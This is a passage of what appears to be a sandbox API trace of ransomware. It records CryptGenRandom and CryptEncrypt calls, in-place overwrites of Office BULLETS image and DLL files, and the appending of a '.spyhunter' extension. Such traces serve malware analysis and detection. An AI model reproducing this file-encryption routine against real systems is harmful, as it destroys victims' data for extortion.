HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.667] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.667] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x248fc1c*, lpNumberOfBytesWritten=0x248fbdc*=0x4, lpOverlapped=0x0) returned 1 [0101.668] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbdc*=0x30, lpOverlapped=0x0) returned 1 [0101.668] CloseHandle (hObject=0xb4) returned 1 [0101.669] GetProcessHeap () returned 0x2c0000 [0101.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.669] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF.spyhunter") returned 83 [0101.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115841.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115841.gif.spyhunter")) returned 1 [0101.670] GetProcessHeap () returned 0x2c0000 [0101.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.670] GetProcessHeap () returned 0x2c0000 [0101.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.670] GetProcessHeap () returned 0x2c0000 [0101.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6d60 | out: hHeap=0x2c0000) returned 1 [0101.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc18 | out: pbBuffer=0x248fc18) returned 1 [0101.670] GetProcessHeap () returned 0x2c0000 [0101.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.670] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc10*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc10*=0x30) returned 1 [0101.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115840.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF") returned 73 [0101.671] StrStrW (lpFirst="J0115840.GIF", lpSrch=".txt") returned 0x0 [0101.671] GetProcessHeap () returned 0x2c0000 [0101.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.671] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbd4*=0xbe, lpOverlapped=0x0) returned 1 [0101.672] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.672] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbd4*=0xbe, lpOverlapped=0x0) returned 1 [0101.672] GetProcessHeap () returned 0x2c0000 [0101.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.672] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.672] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x248fc14*, lpNumberOfBytesWritten=0x248fbd4*=0x4, lpOverlapped=0x0) returned 1 [0101.672] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbd4*=0x30, lpOverlapped=0x0) returned 1 [0101.672] CloseHandle (hObject=0xb4) returned 1 [0101.672] GetProcessHeap () returned 0x2c0000 [0101.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.672] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF.spyhunter") returned 83 [0101.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115840.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115840.gif.spyhunter")) returned 1 [0101.673] GetProcessHeap () returned 0x2c0000 [0101.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.673] GetProcessHeap () returned 0x2c0000 [0101.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.673] GetProcessHeap () returned 0x2c0000 [0101.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6c80 | out: hHeap=0x2c0000) returned 1 [0101.673] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc18 | out: pbBuffer=0x248fc18) returned 1 [0101.673] GetProcessHeap () returned 0x2c0000 [0101.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.674] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc10*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc10*=0x30) returned 1 [0101.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115839.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.674] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF") returned 73 [0101.674] StrStrW (lpFirst="J0115839.GIF", lpSrch=".txt") returned 0x0 [0101.674] GetProcessHeap () returned 0x2c0000 [0101.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.674] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbd4*=0xbe, lpOverlapped=0x0) returned 1 [0101.675] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.675] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbd4*=0xbe, lpOverlapped=0x0) returned 1 [0101.675] GetProcessHeap () returned 0x2c0000 [0101.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.675] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.675] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x248fc14*, lpNumberOfBytesWritten=0x248fbd4*=0x4, lpOverlapped=0x0) returned 1 [0101.676] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbd4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbd4*=0x30, lpOverlapped=0x0) returned 1 [0101.676] CloseHandle (hObject=0xb4) returned 1 [0101.676] GetProcessHeap () returned 0x2c0000 [0101.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.676] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF.spyhunter") returned 83 [0101.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115839.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115839.gif.spyhunter")) returned 1 [0101.676] GetProcessHeap () returned 0x2c0000 [0101.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.676] GetProcessHeap () returned 0x2c0000 [0101.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.677] GetProcessHeap () returned 0x2c0000 [0101.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6ba0 | out: hHeap=0x2c0000) returned 1 [0101.677] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc10 | out: pbBuffer=0x248fc10) returned 1 [0101.677] GetProcessHeap () returned 0x2c0000 [0101.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc08*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc08*=0x30) returned 1 [0101.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115836.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.677] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF") returned 73 [0101.677] StrStrW (lpFirst="J0115836.GIF", lpSrch=".txt") returned 0x0 [0101.677] GetProcessHeap () returned 0x2c0000 [0101.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.677] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbcc*=0xad, lpOverlapped=0x0) returned 1 [0101.678] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.678] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbcc*=0xad, lpOverlapped=0x0) returned 1 [0101.679] GetProcessHeap () returned 0x2c0000 [0101.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.679] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.679] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x248fc0c*, lpNumberOfBytesWritten=0x248fbcc*=0x4, lpOverlapped=0x0) returned 1 [0101.679] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbcc*=0x30, lpOverlapped=0x0) returned 1 [0101.679] CloseHandle (hObject=0xb4) returned 1 [0101.679] GetProcessHeap () returned 0x2c0000 [0101.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.679] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF.spyhunter") returned 83 [0101.679] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115836.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115836.gif.spyhunter")) returned 1 [0101.680] GetProcessHeap () returned 0x2c0000 [0101.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.680] GetProcessHeap () returned 0x2c0000 [0101.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.680] GetProcessHeap () returned 0x2c0000 [0101.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6ac0 | out: hHeap=0x2c0000) returned 1 [0101.680] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc10 | out: pbBuffer=0x248fc10) returned 1 [0101.680] GetProcessHeap () returned 0x2c0000 [0101.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.680] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc08*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc08*=0x30) returned 1 [0101.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115835.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF") returned 73 [0101.681] StrStrW (lpFirst="J0115835.GIF", lpSrch=".txt") returned 0x0 [0101.681] GetProcessHeap () returned 0x2c0000 [0101.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.681] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbcc*=0xb1, lpOverlapped=0x0) returned 1 [0101.682] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.682] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbcc*=0xb1, lpOverlapped=0x0) returned 1 [0101.682] GetProcessHeap () returned 0x2c0000 [0101.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.682] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.682] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x248fc0c*, lpNumberOfBytesWritten=0x248fbcc*=0x4, lpOverlapped=0x0) returned 1 [0101.683] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbcc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbcc*=0x30, lpOverlapped=0x0) returned 1 [0101.683] CloseHandle (hObject=0xb4) returned 1 [0101.683] GetProcessHeap () returned 0x2c0000 [0101.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.683] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF.spyhunter") returned 83 [0101.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115835.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115835.gif.spyhunter")) returned 1 [0101.683] GetProcessHeap () returned 0x2c0000 [0101.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.683] GetProcessHeap () returned 0x2c0000 [0101.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.684] GetProcessHeap () returned 0x2c0000 [0101.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf69e0 | out: hHeap=0x2c0000) returned 1 [0101.684] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc08 | out: pbBuffer=0x248fc08) returned 1 [0101.684] GetProcessHeap () returned 0x2c0000 [0101.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.684] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc00*=0x30) returned 1 [0101.684] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115834.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.684] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF") returned 73 [0101.684] StrStrW (lpFirst="J0115834.GIF", lpSrch=".txt") returned 0x0 [0101.684] GetProcessHeap () returned 0x2c0000 [0101.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.684] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbc4*=0xb9, lpOverlapped=0x0) returned 1 [0101.685] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.685] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbc4*=0xb9, lpOverlapped=0x0) returned 1 [0101.685] GetProcessHeap () returned 0x2c0000 [0101.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.686] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.686] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x248fc04*, lpNumberOfBytesWritten=0x248fbc4*=0x4, lpOverlapped=0x0) returned 1 [0101.686] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbc4*=0x30, lpOverlapped=0x0) returned 1 [0101.686] CloseHandle (hObject=0xb4) returned 1 [0101.686] GetProcessHeap () returned 0x2c0000 [0101.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.686] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF.spyhunter") returned 83 [0101.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115834.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115834.gif.spyhunter")) returned 1 [0101.687] GetProcessHeap () returned 0x2c0000 [0101.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.687] GetProcessHeap () returned 0x2c0000 [0101.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.687] GetProcessHeap () returned 0x2c0000 [0101.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6900 | out: hHeap=0x2c0000) returned 1 [0101.687] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc08 | out: pbBuffer=0x248fc08) returned 1 [0101.687] GetProcessHeap () returned 0x2c0000 [0101.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.687] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc00*=0x30) returned 1 [0101.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.780] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 72 [0101.788] StrStrW (lpFirst="BULLETS.DLL", lpSrch=".txt") returned 0x0 [0101.808] GetProcessHeap () returned 0x2c0000 [0101.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.808] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbc4*=0x2800, lpOverlapped=0x0) returned 1 [0101.860] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.861] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbc4*=0x2800, lpOverlapped=0x0) returned 1 [0101.861] GetProcessHeap () returned 0x2c0000 [0101.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.861] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.861] WriteFile (in: hFile=0x16c, lpBuffer=0x248fc04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x248fc04*, lpNumberOfBytesWritten=0x248fbc4*=0x4, lpOverlapped=0x0) returned 1 [0101.861] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbc4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbc4*=0x30, lpOverlapped=0x0) returned 1 [0101.861] CloseHandle (hObject=0x16c) returned 1 [0101.862] GetProcessHeap () returned 0x2c0000 [0101.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.862] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL.spyhunter") returned 82 [0101.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), 